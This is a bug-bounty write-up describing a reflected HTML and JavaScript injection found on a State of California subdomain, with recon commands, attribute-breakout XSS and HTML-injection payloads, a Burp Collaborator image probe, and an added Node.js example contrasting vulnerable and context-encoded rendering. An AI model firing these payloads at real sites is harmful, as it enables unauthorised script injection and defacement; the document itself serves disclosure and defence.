HTML injection leads to JS injection in a State of California domain.
Har Har Mahadev! This is Prince Roy, a cyber security researcher. Last month I found an HTML + JS injection in one of the domains of the State of California. Thanks to Aditya Shende sir for his mentorship.
Okay, guys, I am going to walk you through how I found it, step by step. First, I did recon to enumerate the subdomains of *.ca.gov. I used Subfinder to list them and httpx to keep only the live hosts:
subfinder -d ca.gov | httpx -mc 200 | tee target.txt
Then I opened the live hosts one by one and found a form on one domain. I submitted the payload below and checked where it came back in the response:
<script>alert(1)</script>
After reviewing the page source, I found the value reflected verbatim into an inline script:
$(function(){
  // the request parameter is reflected straight into this JS string literal
  var inframe_param = "<script>alert(1)</script>";
  if(inframe_param == "Y"){
    $("#main-content-container").css("border","none");
  } else {
    $("#main-content-container").css("border","1px solid #CCC");
  }
});
I found that the parameter was reflected with no filtering or encoding of HTML or JS at all. The same value was also reflected inside a double-quoted value attribute of an <input> element, so a leading "> closes the attribute and the tag, and whatever follows is parsed as new markup. (The inline-script sink on its own is less convenient: the HTML tokenizer ends the <script> element at the first </script> it sees, even inside the string literal.) So I decided to try this payload:
"><script>alert("you have been hacked by royzsec")</script>
Boom! I got a pop-up.
But wait: after finding this bug I checked their policy, and my mood dropped, because reflected XSS (RXSS) had been marked out of scope since 5/9/23.
Then I started thinking about how I could turn this into a different security issue, because I wanted to get on their HOF. One thing came to mind: they had only marked RXSS out of scope, not HTML injection (HTMLi) or JS injection. Why not go with those?
Then I injected this HTMLi payload:
"><h1><img src="https://miro.medium.com/v2/resize:fit:640/format:webp/1*JIZCMl07i-cU_uPsJHPFBA.jpeg"><br>HACKED</h1>
The injected heading and image rendered on the page.
Wahh! Then I tried a Burp Collaborator URL as the image source, to see who would fetch it and whether there was any server-side request to chain:
"><h1><img src="https://*.burplink.net"><br>HACKED</h1>
But this time the only HTTP request Collaborator received was from my own browser, not from the server or from any third party. So the image fetch was purely client-side; there was nothing server-side to chain into.
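As an added example (not code from the original post or from the affected site), the following Node.js script reconstructs the two reflection contexts described above, the JS string literal inside the inline <script> and the double-quoted <input> value attribute, and shows why the "> prefix of both the XSS payload and the HTMLi payload breaks out of the vulnerable version, alongside a hardened renderer that encodes each sink for its own context. The template body, the hidden input, the hostname collab.example.invalid and all function names are assumptions.

```javascript
// Added example, not the affected site's code. The template below is a
// reconstruction of the two sinks the write-up describes; only the jQuery
// snippet quoted in the post is taken from the real page.

// Payloads from the write-up. The Collaborator host is a placeholder.
const XSS_PAYLOAD = '"><script>alert("you have been hacked by royzsec")</script>';
const HTMLI_PAYLOAD = '"><h1><img src="https://collab.example.invalid/x"><br>HACKED</h1>';

// Vulnerable rendering: the parameter is concatenated into both contexts verbatim.
function renderVulnerable(inframeParam) {
  return [
    '<input type="hidden" name="inframe_param" value="' + inframeParam + '">',
    '<script>',
    '$(function(){',
    '  var inframe_param = "' + inframeParam + '";',
    '  if(inframe_param == "Y"){',
    '    $("#main-content-container").css("border","none");',
    '  } else {',
    '    $("#main-content-container").css("border","1px solid #CCC");',
    '  }',
    '});',
    '</script>',
  ].join('\n');
}

// HTML entity encoding for text nodes and double-quoted attribute values:
// none of these five characters can change markup structure once encoded.
function encodeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// JS string-literal encoding. JSON.stringify escapes quotes, backslashes and
// control characters; the second pass turns < > & and the U+2028/U+2029 line
// separators into \uXXXX escapes, so a value containing "</script>" can no
// longer terminate the surrounding <script> element in the HTML tokenizer.
function encodeJsString(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Hardened rendering: each sink uses the encoder for its own context.
function renderHardened(inframeParam) {
  return [
    '<input type="hidden" name="inframe_param" value="' + encodeHtml(inframeParam) + '">',
    '<script>',
    '$(function(){',
    '  var inframe_param = ' + encodeJsString(inframeParam) + ';',
    '  if(inframe_param == "Y"){',
    '    $("#main-content-container").css("border","none");',
    '  } else {',
    '    $("#main-content-container").css("border","1px solid #CCC");',
    '  }',
    '});',
    '</script>',
  ].join('\n');
}

// Rough break-out check: count literal start tags of a given name. The template
// itself contains exactly one <script> and no <img>, so any extra occurrence
// means the input created a new element in the markup.
function countOpenTags(html, tagName) {
  const re = new RegExp('<' + tagName + '\\b', 'gi');
  return (html.match(re) || []).length;
}

// Stand-alone demo: compare both renderers on both payloads.
for (const [label, payload, tag] of [['XSS', XSS_PAYLOAD, 'script'], ['HTMLi', HTMLI_PAYLOAD, 'img']]) {
  console.log(label, 'vulnerable <' + tag + '> count:', countOpenTags(renderVulnerable(payload), tag));
  console.log(label, 'hardened   <' + tag + '> count:', countOpenTags(renderHardened(payload), tag));
}
```

The hardened output still carries the attacker's text (it just cannot create elements), which is the behaviour you want from an encoder: the fix is in the rendering, not in a blocklist of payload strings.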
Then I submitted the report anyway, not expecting much.
After one day they accepted my report as a valid issue on Bugcrowd and listed me on their Hall of Fame.
HOF Link: https://bugcrowd.com/cdt-vdp-pro/hall-of-fame
And finally, thank you for reading my small write-up.
Please follow my social media accounts for further updates:
Linkedin: https://www.linkedin.com/in/prince-roy-4b9a75187/
Twitter: https://twitter.com/royzsec
Github: https://github.com/royzsec